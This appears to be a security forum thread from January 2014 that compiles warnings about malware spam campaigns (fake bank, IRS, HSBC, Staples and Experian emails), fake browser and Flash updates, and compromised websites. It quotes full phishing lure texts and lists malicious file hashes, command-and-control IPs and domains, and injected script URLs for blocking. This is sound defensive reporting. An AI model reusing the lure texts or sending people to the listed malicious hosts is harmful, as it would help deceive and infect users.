> http://www.symantec.com/connect/sites/default/files/users/user-2551621/Fake%20Browser%20Update%202.png
Page displayed to Internet Explorer users
> http://www.symantec.com/connect/sites/default/files/users/user-2551621/Fake%20Browser%20Update%203.png
JavaScript loop button which requires 100 clicks to close
> http://www.symantec.com/connect/sites/default/files/users/user-2551621/Fake%20Browser%20Update%204.png
At the time of this blog post, the Internet Explorer version of the Web page is no longer functional. The Chrome download page serves up Chromeupdate.exe while the Firefox download page serves up Firefoxupdate.exe. Both of these samples are detected by Symantec as Trojan.Shylock*..."
* http://www.symantec.com/security_response/writeup.jsp?docid=2011-092916-1617-99
___

Spam Overdose Yields Fareit, Zeus and Cryptolocker
- http://www.f-secure.com/weblog/archives/00002655.html
Jan 9, 2014 - "... massive spam surge with the same subjects and attachments in our spam traps.
>> http://www.f-secure.com/weblog/archives/emails.PNG
>>> http://www.f-secure.com/weblog/archives/emailstats.png
The binary attachment is a threat that is often referred to as Fareit. Fareit is known to steal information such as credentials and account information from installed FTP clients and cryptocurrency wallets, and stored passwords in browsers. For the two samples coming from these spam, we've seen them connecting to these to send information:
• networksecurityx .hopto .org
• 188.167.38.131
• 94.136.131.2
• 66.241.103.146
• 37.9.50.200
In addition to stealing data, these samples download other malware including Zeus P2P... Other malware seen installed in the system was Cryptolocker.
> http://www.f-secure.com/weblog/archives/btc.PNG
... Samples are detected as Trojan.Pws.Tepfer and Trojan.GenericKD variants."

- http://google.com/safebrowsing/diagnostic?site=hopto.org/

- https://www.virustotal.com/en/ip-address/188.167.38.131/information/

- https://www.virustotal.com/en/ip-address/94.136.131.2/information/

- https://www.virustotal.com/en/ip-address/66.241.103.146/information/

- https://www.virustotal.com/en/ip-address/37.9.50.200/information/
___

JPMorgan Chase SecureMail Spam
- http://threattrack.tumblr.com/post/72770317229/jpmorgan-chase-securemail-spam
Jan 9, 2014 - "Subjects Seen:
You have a new encrypted message from JPMorgan Chase & CO.
Typical e-mail details:
You have received a secure e-mail message from JPMorgan Chase & CO..
We care about your privacy, JPMorgan Chase & CO. uses this secure way to exchange e-mails containing personal information.
Read your secure message by opening the attachment. You will be prompted to save (download) it to your computer.
If you have concerns about the validity of this message, please contact the sender directly.
First time users - will need to register after opening the attachment.

Malicious File Name and MD5:
Secureinformation.zip (19CCB0B5FCF8D707671E5F98AC475D36)
Secureinformation.exe (7F81501C468FF358DE1DA5B1F1AD150B)

Screenshot: https://31.media.tumblr.com/84b205b1c95963599c75ad1a8f504e2b/tumblr_inline_mz54fwHloB1r6pupn.png

Tagged: Chase, Upatre
___

IRS Tax Return Spam
- http://threattrack.tumblr.com/post/72779324288/irs-tax-return-spam
Jan 9, 2014 - "Subjects Seen:
IRS: Early 2013 Tax Return Report!
Typical e-mail details:
Dear Member
Here is a report on your early 2013 Federal Tax return report. Kindly download the attachment to view your report and start filling for 2013 return as early as second week of December.
Thanks
Internal Revenue Service

Malicious File Name and MD5:
Early2013TaxReturnReport_D0E7937B80.zip (E76B91B9010AE7ABDC264380B95BF86D)
Early2013TaxReturnReport_983456948574980572398456324965984573984509324.pdf.exe (FE20A23BEC91B7EC1E301B571CE91100)

Screenshot: https://31.media.tumblr.com/a5c84027cb11ed21a4ec12d0754733b1/tumblr_inline_mz5ak6wRXE1r6pupn.png

Tagged: IRS, Fareit
___

- http://blog.mxlab.eu/2014/01/09/email-attn-early-2013-tax-return-report-contains-trojan/

- https://www.virustotal.com/en/file/bcbd43ec615225cede44318677c65f89c9113705c4cd7f975ea3d4c327a18bd5/analysis/
Early2013TaxReturnReport_ ...
Analysis date: 2014-01-10 12:55:07 UTC

- https://malwr.com/analysis/YzgyZWQzMDI2YjRjNGZlNTg3MzYwY2Y1OTU4MDdhODQ/

:fear: :mad:

AplusWebMaster
2014-01-10, 19:33
FYI...

Fake Bank Statement SPAM
- http://threattrack.tumblr.com/post/72870666524/bank-statement-spam
Jan 10, 2014 - "Subjects Seen:
Bank Statement. Please read
Typical e-mail details:
Hello <email name>,
I attached the December Invoice that contains the Property Tax and the other document showing the details mentioned below.
I am at your disposal for any further question.
Waiting for your instructions concerning the document attached.
Goldie Oliver

Malicious File Name and MD5:
USBank_December_2013_17F9968085.zip (5A2E558A7DC17998A11A0FBFB34AACF9)
USBank - December 2013_ID39485394562093456309847589346598237598320471237481923427583450.pdf.exe (2089EAC526883C98D67D399449B461DB)

Screenshot: https://31.media.tumblr.com/66b87ad8c326f8dd4df1ae31ff410018/tumblr_inline_mz6x0jV1p11r6pupn.png

Tagged: Bank Statement, Fareit
___

Junk Mail vs Scam Mail
- http://www.bbb.org/blog/2014/01/junk-mail-vs-scam-mail/
Jan 10, 2014 - "Many of the items sent to consumers in-boxes these days are little more than junk mail. But BBB warns a growing number of spam emails are designed to inflict harm. While it may seem like this topic comes up frequently, unfortunately, scammers find a way to catch users off guard. Right after the Target store hacking of some 40 million credit and debit cards, BBB issued a warning* about emails claiming to be from Target but were disguised as malware designed to steal identity information. The warning was issued in light of all the scam emails on internet right now. The hard part is telling the difference between a legitimate email from a vendor you do subscribe to and one that looks like the vendor but isn’t... Check for misspellings and grammatical errors. Silly mistakes and sloppy copy – for example, an area code that doesn’t match an address – often are giveaways that the site is a scam. Messaging like, “Just tell us where to send this $1,100” -or- “a delivery was cancelled because of problems with the mailing addressed and to please provide a correct address” is another giveaway. Companies typically do not use this type of language. A recent trend in scam emails are asking users to select a link on a state where they are to send the money or to send the correct address. This link will then lead to a site where a thief will use the information for their own use. It isn’t wise to select the links or open attachments in emails you aren’t familiar with especially ones you haven’t solicited from. When in doubt, check with the company before you respond to any website that asks you to enter personal identifying information. Bottom line, unless you’ve done business with the company or are on a mailing list with them – do -not- click on email links even if they appear to be from legitimate companies. Far too many times these days, it’s all just a scam."
* http://www.bbb.org/blog/2014/01/watch-for-scams-following-target-data-breach/
___

Google linking of social network contacts to email raises concerns
- http://www.reuters.com/article/2014/01/10/us-google-gmail-idUSBREA081NH20140110
Jan 9, 2014 - "A new feature in Google Inc's Gmail will result in some users receiving messages from people with whom they have not shared their email addresses, raising concerns among some privacy advocates. The change, which Google announced on Thursday, broadens the list of contacts available to Gmail users so it includes both the email addresses of their existing contacts, as well as the names of people on the Google+ social network. As a result, a person can send an email directly to friends, and strangers, who use Google+. Google is increasingly trying to integrate its Google+, a two-and-a-half-year old social network that has 540 million active users, with its other services. When consumers sign up for Gmail, the company's Web-based email service, they are now automatically given a Google+ account. Google said the new feature will make it easier for people who use both services to communicate with their friends... Some privacy advocates said Google should have made the new feature "opt-in," meaning that users should explicitly agree to receive messages from other Google+ users, rather than being required to manually change the setting... A Google spokeswoman said the company planned to send an email to all Google+ users during the next two days alerting them to the change and explaining how to change their settings..."

:fear: :mad: :sad:

AplusWebMaster
2014-01-12, 17:25
FYI...

Sefnit-added Tor service ...
- https://net-security.org/malware_news.php?id=2673
Jan 10, 2014 - "... the Sefnit click-fraud Trojan... has been around since 2009... This rapid rise in Tor connections has served to see just how many computers were infected with the malware, and the number was staggering: over four million. Since then, Microsoft has been working to diminish that number... Microsoft has decided to retroactively clean the machines that still had the Sefnit-added Tor service, and practically managed to do so for half of them - around 2 million - in just two months...
> http://www.net-security.org/images/articles/ms-10012014-big.jpg
... two million cleaned computers is better than none, two million more remain at risk... In order to help these users, Microsoft has compiled a short step-by-step guide* on how to do it..."
* http://blogs.technet.com/b/mmpc/archive/2014/01/09/tackling-the-sefnit-botnet-tor-hazard.aspx
9 Jan 2014

:fear::fear:

AplusWebMaster
2014-01-13, 18:38
FYI...

Fake Dept. of Treasury SPAM
- http://blog.dynamoo.com/2014/01/department-of-treasury-notice-of.html
13 Jan 2014 - "This US Treasury spam (but apparently sent from salesforce .com) has a malicious attachment:
Date: Mon, 13 Jan 2014 18:54:16 +0700 [06:54:16 EST]
From: "support@salesforce .com" [support@salesforce .com]
Subject: Department of Treasury Notice of Outstanding Obligation - Case H6SYVMK704BX4AL
Important please review and sign the attached document!
We have received notification from the Department of the Treasury,
Financial Management Service (FMS) that you have an outstanding
obligation with the Federal Government that requires your immediate
attention.
In order to ensure this condition does not affect any planned
contract or grant activity, please review and sign the attached document and if
you are unable to understand the attached document please call FMS at 1-800-304-3107
to address this issue. Please make sure the person making the telephone call has the
Taxpayer Identification Number available AND has the authority/knowledge
to discuss the debt for the contractor/grantee.
Questions should be directed to the Federal Service Desk ...

Attached is a file FMS-Case-H6SYVMK704BX4AL.zip (VirusTotal detection rate 7/47*) which in turn contains a malicious executable FMS-Case-{_Case_DIG}.exe (detection rate also 7/47**)... analysis shows an attempted connection to anggun.my .id on 38.99.253.234 (Cogent, US). This seems to be the only domain on that server, blocking either may be prudent."
* https://www.virustotal.com/en-gb/file/abbfbaadd5ea95647e9c79e2a7cfc87bd84dab8849c7a2ad4c70c9fd8f07c001/analysis/1389622089/

** https://www.virustotal.com/en-gb/file/2b992fd40c86b615b6e91c186eed79714493c77d0588fe59e3f01dbcbe8bcbb0/analysis/1389622087/
___

Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Financial Tips Attachment Email Messages - 2014 Jan 13
Fake Account Payment Information Email Messages - 2014 Jan 13
Fake Court Appearance Request Email Messages - 2014 Jan 13
Fake Product Catalog Email Messages - 2014 Jan 13
Fake Company Complaint Email Messages - 2014 Jan 13
Fake Bank Account Statement Email Messages - 2014 Jan 13
Fake Package Tracking Information Email Messages - 2014 Jan 13
Fake Payroll Invoice Email Messages - 2014 Jan 13
Fake Bank Payment Notification Email Messages - 2014 Jan 13
Fake Invoice Statement Attachment Email Messages - 2014 Jan 13
(More detail and links at the cisco URL above.)

:fear: :mad:

AplusWebMaster
2014-01-14, 21:32
FYI...

Fake HSBC SPAM / Payment Advice.exe
- http://blog.dynamoo.com/2014/01/hsbc-payment-advice-spam-payment.html
14 Jan 2014 - "This -fake- HSBC spam comes with a malicious attachment:
Date: Tue, 14 Jan 2014 11:57:29 -0300 [09:57:29 EST]
From: HSBC Advising Service [advising.service.738805677.728003.693090157@ mail.hsbcnet.hsbc .com]
Subject: Payment Advice - Advice Ref:[G72282154558] / Priority payment / Customer Ref:[63 434S632U9I]
Sir/Madam
The attached payment advice is issued at the request of our customer. The advice is for your reference only.
Yours faithfully
Global Payments and Cash Management
HSBC ...

The is an attachment Payment Advice [G72282154558].zip which contains an executable Payment Advice.exe with a VirusTotal detection rate of 12/48*. Automated analysis... shows an attempted connection to thebostonshaker .com on 206.190.147.139 (Salt Lake City Hosting, US). It is the only site on this IP address, blocking either temporarily may give some protection."
* https://www.virustotal.com/en-gb/file/3bfd83deba0221db8d741b4492d5487245a8a50156d302aa0d2fe8ee4f368b70/analysis/1389713473/
___

Unsolicted SPAM...
- http://blog.dynamoo.com/2014/01/uncensored-download-spam-leads-to-adware.html
14 Jan 2014 - "... plagued with these over the past few days, emails coming in with the following subjects:
Underground XXX files
Free porno torrents
Uncensored download
The body text contains just a link to [donotclick]goinst .com/download/getfile/1205000/0/?q=Uncensored%20download
In turn this downloads a file Uncensored download__3516_i263089565_il6090765.exe and of course that's about as trustworthy as a van with "FREE CANDY" ... A quick look at the EXE in VirusTotal* indicates that it's some sort of Adware, probably pay-per-install. An examination of the binary shows a digital signature for Shetef Solutions & Consulting (1998) Ltd who are probably -not- behind the spam run, but are probably inadvertently paying the spammers for installations. Avoid."
* https://www.virustotal.com/en-gb/file/b998d160881aa19487888014cf12e276ba55b54d3405b45699cf507b7acda416/analysis/1389715495/
___

More WhatsApp Message Spam
- http://threattrack.tumblr.com/post/73312753221/whatsapp-message-spam
Jan 14, 2014 - Subjects Seen:
Missed voice message, “4:27”PM
Typical e-mail details:
New voicemessage.
Please download attached file
Description
Jan 09 2:44PM PM
08 seconds

Malicious File Name and MD5:
Missed-message.zip (687C8BE7F4A56A00AF03ED9DFC3BFB76)
Missed-message.exe (BF1411F18EA12E058BFB05692E422216)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/ede2bd7794acfb19f8ead1a762f1ed8e/tumblr_inline_mzefht1KF81r6pupn.png

Tagged: WhatsApp, Upatre
___

Fake ADP invoice w/ Fiserv document - TROJAN
- http://blog.mxlab.eu/2014/01/14/genvariant-strictor-49180-trojan-attached-to-emails-regarding-adp-invoice-and-fiserv-document/
Jan 14, 2014 - "... intercepting different type of emails with an attached Gen:Variant.Strictor.49180.
> ADP Invoice - This email is send from the spoofed address “payroll.invoices@ adp .com” while the SMTP from is “fraud@ aexp .com”, comes with the subject “Invoice #3164342″ and has the following body:
Attached is the invoice (Invoice_ADP_3164342.zip) received from your bank.
Please print this label and fill in the requested information. Once you have filled out
all the information on the form please send it to payroll.invoices@ adp. com.
For more details please see the attached file.
Please do not reply to this e-mail, it is an unmonitored mailbox!
Thank you ,
Automatic Data Processing, Inc...
The attached ZIP file has the name Invoice_ADP_3164342.zip and contains the 19 kB large file Invoice_ADP_01142014.exe.

> Fiserv attached document - This email is send from the spoofed address “Fiserv <Debra_Drake@ fiserv .com>” while the SMTP from is “fraud@ aexp .com”, comes with the subject “FW: Scanned Document Attached” and has the following body:
Dear Business Associate:
Protecting the privacy and security of client, company, and employee
information is one of our highest priorities. That is why Fiserv has
introduced the Fiserv Secure E-mail Message Center – a protected e-mail
environment designed to keep sensitive and confidential information
safe. In this new environment, Fiserv will be able to send e-mail
messages that you retrieve on a secured encrypted file.
You have an important message from Debra_Drake@ fiserv .com. To see your message, use the following password to decrypt attached file: JkSIbsJPPai
If this is your first time receiving a secure file from the
Fiserv Secure E-mail Message Center, you will be prompted to set up a
user name and password... If you have any questions, please contact your Fiserv representative...
The attached ZIP file has the name FSEMC.Debra_Drake.zip and contains the 19 kB large file FSEMC_01142014.exe. The trojan is known as Gen:Variant.Strictor.49180 by most of the virus engines but also as PWSZbot-FMO!5B171D420618, Heuristic.LooksLike.Win32.Suspicious.J!81, TrojanDownloader:Win32/Upatre.A or PE:Malware.FakePDF@CV!1.9C28. At the time of writing, 12 of the 48 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/88f4cae7b769ce0eb2ad50aff40d5832cd3c9e3bca10aee5b10d088d2347bb92/analysis/

- https://malwr.com/analysis/ZTNjMzM4Y2Y0NDFkNDQzZTgwZWE0ZGUyNmJjOTEyZDg/

- https://www.virustotal.com/en-gb/ip-address/206.190.147.142/information/

- https://www.virustotal.com/en-gb/ip-address/95.101.0.115/information/
___

Fake Quickbooks Invoice - Trojan.Zbot ...
- http://blog.mxlab.eu/2014/01/14/trojan-zbot-ide-attached-to-different-emails-quickbooks-invoice-important-docs/
Jan 14, 2014 - "... intercepting different type of emails with an attached Trojan.Zbot.IDE.
> Quickbooks Invoice: This email is send from the spoofed address “QuickBooks Invoice <auto-invoice@ quickbooks .com>” while the SMTP from is “fraud@ aexp .com”, has the subject “Notification of direct debit of fees” and has the following body:
Notification Number: 5430143
Mandate Number: 8396466
###THIS IS AN AUTO NOTIFICATION EMAIL. DO NOT REPLY TO THE SENDER OF THIS EMAIL. IF YOU HAVE A QUERY PLEASE REFER TO THE INFORMATION BELOW ###
This is notification that Land Registry will debit 214.00 GBP from your nominated account on or as soon as possible before 15/01/2013.
Details of fees that we shall be collecting by direct debit for the applications charged are now available to view.
You can access these by opening attached report.
If you have an enquiry relating to your VDD account please contact Customer Support at customersupport@ landregistry .gsi .gov .uk or call on 0844 892 1111. For all enquiries, please quote your key number.
Thank you,
Land Registry ...
The attached ZIP file has the name Notification_5430143.zip and contains the 19 kB large file Notification_1401.exe.
> Important Docs: This email is send from the spoofed address “Elbert Hickman <xxxx@ rbs .co .uk>” while the SMTP from is “fraud@aexp .com”, has the subject “Important Docs” and has the following body:
Check attached docs.
Elbert Hickman
Commercial Banking Support
Thames Gateway Commercial Office
2nd Floor, Riverbridge House, Anchor Boulevard,
Crossways, Dartford, Kent DA2 6SL
Depot Code 023
Tel: 01322 639620
Fax: 01322 606862
email: Elbert@ rbs .co .uk ...
The attached ZIP file has the name Docs_14012014.zip and contains the 19 kB large file Docs_14012014.exe. The trojan is known as Trojan.Zbot.IDE, Trojan-Spy.Zbot, TR/Yarwi.B.117, W32/Trojan.TROM-4807 or Trojan.Email.FakeDoc. At the time of writing, 14 of the 48 AV engines did detect the trojan at Virus Total*."
* https://www.virustotal.com/en/file/2bd962a5552826c2b24447a8bcbce7d7f08c0c863cb041d70f851771a77a6ef5/analysis/1389713323/

- https://malwr.com/analysis/ZjM0MmVjY2QwOWY5NGU2MTlhNTBiNTBjYzE5OTY5ZmI/

- https://www.virustotal.com/en-gb/ip-address/85.204.19.17/information/

- https://www.virustotal.com/en-gb/ip-address/95.101.0.104/information/
___

Fake PG&E SPAM
- http://blog.dynamoo.com/2014/01/pg-gas-and-electric-usage-statement-spam.html
14 Jan 2014 - "This -fake- spam from the Pacific Gas & Electric company is presumably meant to have a malicious payload, but all I get is a server error..
From: PG&E [do_not_reply@ sourcefort .com]
Reply-To: PG&E [do_not_reply@ sourcefort .com]
Date: 14 January 2014 22:37
Subject: Gas and Electric Usage Statement
PG & E ENERGY STATEMENT Account No: 718198305-5
Statement Date: 01/10/2014
Due Date: 02/01/2014
Your Account Summary
Amount Due on Previous Statement $344.70
Payment(s) Recieved Since Last Statement 0.0
Previous Unpaid Balance $344.70
Current Electric Charges $165.80
Current Gas Charges 49.20
Total Amount Due BY 02/01/2014 $559.7
To view your most recent statement, please click here You must log-in to your account or register for an online account to view your statement...

Screenshot: http://2.bp.blogspot.com/-AhQr4bPPcjA/UtW8y45D6fI/AAAAAAAACZw/EPN9GQZd8nA/s1600/pge.png

To give PG&E full credit, they have a link on their homepage about it and a full warning here*. These scam emails seem to have been doing the rounds for quite a few days now."
* http://www.pgecurrents.com/2014/01/08/pge-warns-of-scam-emails-calls/

:mad: :mad:

AplusWebMaster
2014-01-15, 18:00
FYI...

Fake Staples order SPAM...
- http://blog.dynamoo.com/2014/01/staples-your-order-is-awaiting.html
15 Jan 2014 - "This -fake- Staples spam has a malicious attachment:
Date: Wed, 15 Jan 2014 15:40:44 +0800 [02:40:44 EST]
From: Staples Advantage Orders [Order@ staplesadvantage .com]
Subject: Your order is awaiting verification!
Order Status: Awaiting verification
Order #: 5079728
Your order has been submitted and is awaiting verification from you.
Order #: 5079728
Order Date and Eastern Time: 2/19/2013 12:28 PM
Order Total: $152.46
This is potentially due to missing or invalid order or payment information. If you receive this status message, please call Customer Service immediately for assistance....

Screenshot: https://lh3.ggpht.com/--iaCgzY9eyg/UtanjFKqkSI/AAAAAAAACaA/W4MGugL9yLU/s1600/staples2.png

Attached is a ZIP file Order_5079728.zip which in turn contains a malicious executable Order_{_partorderb}.exe which has a VirusTotal detection rate of 23/47*. The Malwr report is pretty inconclusive, so presumably the binary is hardened against automated analysis tools."
* https://www.virustotal.com/en-gb/file/351499a61b3c987967fa2754a1726e4fc4d2ea3dddb352552584cbb10e74f8a1/analysis/1389799070/

- http://threattrack.tumblr.com/post/73414944865/staples-order-verification-spam
Jan 15, 2014 - "Subjects Seen:
Your order is awaiting verification!
Typical e-mail details:
Your order has been submitted and is awaiting verification from you.
Order #: 1178687
Order Date and Eastern Time: 2/19/2013 12:28 PM
Order Total: $271.74
This is potentially due to missing or invalid order or payment information. If you receive this status message, please call Customer Service immediately for assistance...

Malicious File Name and MD5:
Order_1178687.zip (312C682B547215FB1462C7C46646A1B7)
Order_{_partorderb}.exe (1D85D2CC51AC6E1A2805366BB910EF70)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/b3864d35e3fb5fe5d4789b184d92c16f/tumblr_inline_mzg9f3cJYM1r6pupn.png

Tagged: Staples, Upatre
___

Fake RBS pwd reset SPAM – PDF malware
- http://myonlinesecurity.co.uk/rbs-bankline-password-reset-form-fake-pdf-malware/
15 Jan 2014 - "... another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses, with the hope of getting a better response than they do from consumers. Of course the RBS Bankline Password Reset Form is not from RBS or any other bank. Once the scammers and malware purveyors find a new or different scam they will use every bank they can to try to infect as many users as they can. Normally when you see an attachment or email with a subject like RBS Bankline Password Reset Form, you automatically think that it is another phishing attempt. In this case it is not phishing but a very nasty malware- virus-trojan. Almost all of these have a password stealing component, with the aim of stealing your email or FTP ( web space) log in credentials. Many of them are also designed to specifically steal your facebook and other social network log in details.
Please find the Re-activation form attached, send one per user ensuring only one box is selected in section 3. A signatory on the bank mandate must sign the form. Fax to 0845 878 9791 or alternatively email a scanned copy of the form to banklineadministration@ rbs .co .uk, on receipt of the completed form we will respond to the request within 2 working hours and communicate this to the user by email. <<RBS_Bankline_Password_Reactivation.pdf>> Please note – The life-span of an activation code is 21 days; after this time, the activation code will expire and a new one must be ordered. Please be aware when choosing a new pin and password for the service, it is important not to use pin/passwords that you have used before but to use completely different details. If you are the sole Administrator may I take this opportunity to suggest when you are reinstated on the system, to set up another User in an Administrator role. This will prevent you being locked out completely and allow you to order a new activation code from within the system and reset your security sooner. If you require any further assistance then please do not hesitate to contact us...
Regards
Bankline Product Support ...

RBS_Bankline_Password_Reactivation.zip extracts to RBS_Bankline_Password_Reactivation.exe. Current Virus total detections: 2/48*. MALWR Auto Analysis**... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email. Whether it is a message saying “look at this picture of me I took last night” and it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. Be very careful when unzipping them and make sure you have “show known file extensions enabled“, And then look carefully at the unzipped file. If it says .EXE then it is a problem and should not be run or opened."
* https://www.virustotal.com/en/file/e9f2c240795640b17f43c0ef322d483a86e023146889c06a9f81fe1b3b0d3e0c/analysis/

** https://malwr.com/analysis/YmYyYjIzMGM2N2I3NGJmZjhhMDlkMmFjMTE5MTA1NGM/

38.102.226.94
- https://www.virustotal.com/en-gb/ip-address/38.102.226.94/information/

- http://google.com/safebrowsing/diagnostic?site=AS:174
___

Compromised Sites pull Fake Flash Player from SkyDrive
- http://www.f-secure.com/weblog/archives/00002659.html
Jan 15, 2014 - "On most days, our WorldMap* shows more of the same thing. Today is an exception... One infection is topping so high in the charts that it pretty much captured our attention. Checking the recent history of this threat, we saw that these past few days, it has been increasing in infection hits... It wasn't long before we saw that a lot of scripts hosted in various websites got compromised. Our telemetry actually showed that almost 40% of the infected websites were hosted in Germany. In those sites, malicious code has been appended to the scripts... Successful redirection leads to a fake flash download site that look similar to these pages:
> http://www.f-secure.com/weblog/archives/5_flash1.PNG
... The user would have to manually click on the Download Now link before a file called flashplayer.exe could be downloaded from a certain SkyDrive account. When the malicious flashplayer.exe is executed, this message is displayed to the user.
> http://www.f-secure.com/weblog/archives/7_dialog.PNG
While in the background, it is once again connecting to the same SkyDrive account in order to download another malware... Initial analysis showed that the sample is connecting to these locations.
> http://www.f-secure.com/weblog/archives/9_post.PNG ..."

* http://worldmap3.f-secure.com/

- https://www.virustotal.com/en-gb/ip-address/208.73.210.155/information/

- https://www.virustotal.com/en-gb/ip-address/151.236.24.49/information/

:sad: :fear: :mad:

AplusWebMaster
2014-01-16, 15:56
FYI...

Cushion Redirect sites using hijacked GoDaddy domains to block
- http://blog.dynamoo.com/2014/01/cushion-redirect-sites-using-hijacked.html
16 Jan 2014 - "... some suspect activity on 194.28.175.129 (BESTHOSTING-AS ON-LINE Ltd, Ukraine) which appears to be hosting some Cushion Redirect domains (explained here*) which is being injected into certain sites such as the one in this URLquery report**... A brief examination of the server shows several subdomains of hijacked GoDaddy domains being used for malicious redirects... The hijacked GoDaddy domains in question are:
allgaysitespassfree .com
amateurloginfree .com
yourchicagocarservice .com
yourchicagogranite .com
yourchicagohummerlimo .com
yourbestpartybus .com
A quick look at the Google stats for AS42655*** indicate to me personally that blocking 194.28.172.0/22 might be a prudent idea if you don't have any reason to send traffic to Ukrainian sites."
* http://malwaremustdie.blogspot.com/2013/09/302-redirector-new-cushion-attempt-to.html

** http://urlquery.net/report.php?id=8838865

- https://www.virustotal.com/en-gb/ip-address/194.28.175.129/information/

*** http://www.google.com/safebrowsing/diagnostic?site=AS:42655
___

Script exploits lead to Adscend Media LLC ads
- http://blog.dynamoo.com/2014/01/script-exploits-lead-to-adscend-media.html
16 Jan 2014 - "Over the past few days I have seen several cases where legitimate websites have had .js files interfered with in order to serve up something malicious. Here is a case in point.. the German website physiomedicor .de has been hacked to serve up a fake Flash download, as can be seen from this URLquery report*. In this case it's pretty easy to tell what's going on from the URLquery screenshot:
> http://3.bp.blogspot.com/-BqNzhIdeK1Y/Utfer7qFwFI/AAAAAAAACa0/gHJVqXmtrVk/s1600/urlquery.jpg
What has happened is that somehow an attacker has altered several .js files on the victim's site and has appened extra code. In this case the code has been appened to [donotclick]www.physiomedicor .de/assets/rollover.js as follows...
> http://4.bp.blogspot.com/-Gb14LMV3niM/UtfgX5HhfII/AAAAAAAACbA/Kg04ljNJmF0/s1600/injection1.png
In this case the code injected tries to load a script from a hijacked site [donotclick]ghionmedia .com/PROjes/goar2RAn.php?id=56356336 but this isn't the first time that I've seen this format of URL injected into a script today as I've seen these other two (also using hijacked sites) as well:
[donotclick]berriesarsuiz .com/ptc84vRb.php?id=117515949
[donotclick]www.karsons .co .uk/qdrX3tDB.php?id=114433444
... Adscend Media has been accused of deceptive advertising practices** before which makes me think that it might be a good candidate for -blocking- on your network, especially as they have private WHOIS details for that domain. If you want to banish these from your network then the following list might help:
199.59.164.5
adscendmedia .com
adshiftclick .com
jmp2 .am
lnkgt .com ..."
(More detail at the dynamoo URL above.)
* http://urlquery.net/report.php?id=8840002

** http://news.cnet.com/8301-1023_3-57429518-93/alleged-facebook-likejacker-settles-with-washington-state/

81.169.145.150
- https://www.virustotal.com/en-gb/ip-address/81.169.145.150/information/
___

Fake malicious "ACTION REQUIRED" SPAM
- http://blog.dynamoo.com/2014/01/action-required-document-has-arrived.html
16 Jan 2014 - "This spam with a lengthy subject has a malicious attachment:
Date: Thu, 16 Jan 2014 09:39:28 -0600 [10:39:28 EST]
From: "support@salesforce .com" [support@salesforce .com]
Subject: ACTION REQUIRED: A document has arrived for your review/approval (Document Flow Manager)
Priority: High Priority 2
This message is for the designated recipient only and may contain privileged, proprietary, or otherwise private information. If you have received it in error, please notify the sender immediately and delete the original. Any other use of the email by you is prohibited.
Record ID: HJRQY9PSXBSK334
Supplier: http ://[victimdomain .com]
Invoice No.: 5644366804
Document No.: 3319683775
Invoice amount: USD 0488.21
Rejection reason(s): Approval Required
Please find enclosed a record of invoice that could not be processed. We would like to ask you to assist us in resolving the noted rejection reasons.

Attached is a file SFHJRQY9PSXBSK334.zip which in turn contains a malicious executable SF.EXE which has an icon that makes it look like a PDF file. This file has a very low detection rate at VirusTotal of 2/48*... anaylsis shows an attempted connection to centrum .co .id on 75.98.233.44 (Ceranet, US). This is the only site on that server, blocking either the IP or domain might be useful."
* https://www.virustotal.com/en-gb/file/b0d91090761192733241b1825a120ed7c984c3a43ef4cd16cacbeabc4426ebf9/analysis/1389889350/

- http://threattrack.tumblr.com/post/73524218077/salesforce-com-malicious-spam
Jan 16, 2014
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/bfdcf1b6d905c870af58d2bbb29410dc/tumblr_inline_mzi8n1JQ3n1r6pupn.png
Tagged: Salesforce, Upatre
___

Google+ Local - Thousands Of Hotel Listings Hijacked
- http://searchengineland.com/thousands-of-hotels-listings-were-hijacked-in-google-local-181670
Jan 14, 2014 - "Thousands of hotels listed within Google+ Local appear to have had links leading to their official sites “hijacked” and replaced with ones leading to third-party booking services. Google+ Local listings are what Google depends on to provide results in Google Maps or Google Search, when people look for local businesses... Doing a search on Google for Google+ Local listings using these domains reveals how thousands of hotels appear to have been hit. For example, a search for listings using the “RoomsToBook .Info” domain currently brings up 1,880 listings that appear to have been hijacked:
> http://searchengineland.com/figz/wp-content/seloads/2014/01/site_plus_google_com__roomstobook_info__-_Google_Search-4-600x816.jpg
Postscript: Google has now said that I can confirm it is aware of the issue and is working to fix it."

- http://searchengineland.com/local-seos-sound-off-on-google-local-hijackings-181933
Jan 16, 2014 - "... Without offering any substantive comments about the situation Google appears to have cleaned up the problem and mostly if not entirely restored the proper links. There’s been no explanation forthcoming about how this might have happened from the company, though Google acknowledged the incident..."

:fear::fear: :mad:

AplusWebMaster
2014-01-17, 18:53
FYI...

Fake Experian Credit Report Malicious Spam
- http://threattrack.tumblr.com/post/73615136871/experian-credit-report-malicious-spam
Jan 17, 2014 - "Subjects Seen:
IMPORTANT - A Key Change Has Been Posted
Typical e-mail details:
A key change has been posted to one of your three national Credit Reports. Each day we monitor your Experian®, Equifax and TransUnion Credit Reports for key changes that may help you detect potential credit fraud or identity theft. Even if you know what caused your Report to change, you don’t know how it will affect your credit, so we urge you to do the following:
View detailed report by opening the attachment.
You will be prompted to open (view) the file or save (download) it to your computer.
For best results, save the file first, then open it in a Web browser.
Contact our Customer Care Center with any additional questions.
Note: The attached file contains personal data.

Malicious File Name and MD5:
Credit_Report_4287362163.zip (1B1C6223EC52CE2E2B8CE6C117A15ADA)
Credit_Report_4287362163.exe (B4101936ED3C8BC09F994223A39E5FE2)

Screenshot: https://31.media.tumblr.com/5f9f8502e65a25465c35c879ef89f06a/tumblr_inline_mzjvs68VC01r6pupn.png

Tagged: Experian, Upatre
___

Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Photograph Sharing Email Messages - 2014 Jan 17
Fake Court Notice Email Messages - 2014 Jan 17
Fake Fax Message Receipt Email Messages - 2014 Jan 17
